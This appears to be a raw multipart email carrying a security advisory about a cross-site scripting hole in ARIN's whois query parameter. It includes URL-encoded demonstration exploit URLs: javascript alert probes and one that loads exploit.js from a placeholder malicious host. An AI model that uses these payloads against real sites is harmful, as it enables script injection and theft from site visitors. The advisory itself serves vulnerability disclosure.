This is a multi-part message in MIME format.
--_117C6D30-EC32-4CA9-A4BD-07EFF66F2B52_
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Title
ARIN.NET input validation holes in "?queryinput=3D" allows remote users =
conduct cross-site scripting attacks
Notification
Multiple attempts to contact Arin site administrators went unanswered
Exploit Included: Yes
Description
The "?queryinput=3D" script does not properly validate user-supplied =
input in several parameters to filter HTML code. A remote user can =
create a specially crafted URL that, when loaded by a target user, will =
cause arbitrary scripting code to be executed by the target user's =
browser.=20
Some demonstration exploit URLs are provided:
http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22javascript%3Aalert=
%28%27XSS%27%29%3B%22%3E
http://ws.arin.net/whois/?queryinput=3D%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalic=
iousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
http://ws.arin.net/whois/?queryinput=3D%3CIMG+SRC%3D%22javascript%3Aalert=
%28%27XSS%27%29%3B%22%3E
Discovered by Terminal Entry security [.at.] peadro (.)net
This email and any files transmitted with it are confidential and =
intended
solely for the use of the individual or entity to whom they are =
addressed. If you have received this email in error please notify the =
system manager. This
message contains confidential information and is intended only for the =
individual named. If you are not the named addressee you should not =
disseminate,
distribute or copy this e-mail. Please notify the sender immediately by =
e-mail if you have received this e-mail by mistake and delete this =
e-mail from your
system. If you are not the intended recipient you are notified that =
disclosing, copying, distributing or taking any action in reliance on =
the contents of this
information is strictly prohibited.
--_117C6D30-EC32-4CA9-A4BD-07EFF66F2B52_
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Title
ARIN.NET input validation holes in "?queryinput=3D" allows =
remote users conduct cross-site scripting =
attacks
Notification
Multiple attempts to contact =
Arin site administrators went unanswered
Exploit =
Included: Yes
Description
The "?queryinput=3D" script does not properly validate =
user-supplied input in several parameters to filter HTML code. A remote =
user can create a specially crafted URL that, when loaded by a target =
user, will cause arbitrary scripting code to be executed by the target =
user's browser.
Some demonstration exploit URLs are =
provided:
Discovered by =
Terminal Entry security [.at.] peadro =
(.)net
This email and any files transmitted =
with it are confidential and intended solely for the use of the =
individual or entity to whom they are addressed. If you have received =
this email in error please notify the system manager. This message =
contains confidential information and is intended only for the =
individual named. If you are not the named addressee you should not =
disseminate, distribute or copy this e-mail. Please notify the sender =
immediately by e-mail if you have received this e-mail by mistake and =
delete this e-mail from your system. If you are not the intended =
recipient you are notified that disclosing, copying, distributing or =
taking any action in reliance on the contents of this information is =
strictly prohibited.
--_117C6D30-EC32-4CA9-A4BD-07EFF66F2B52_--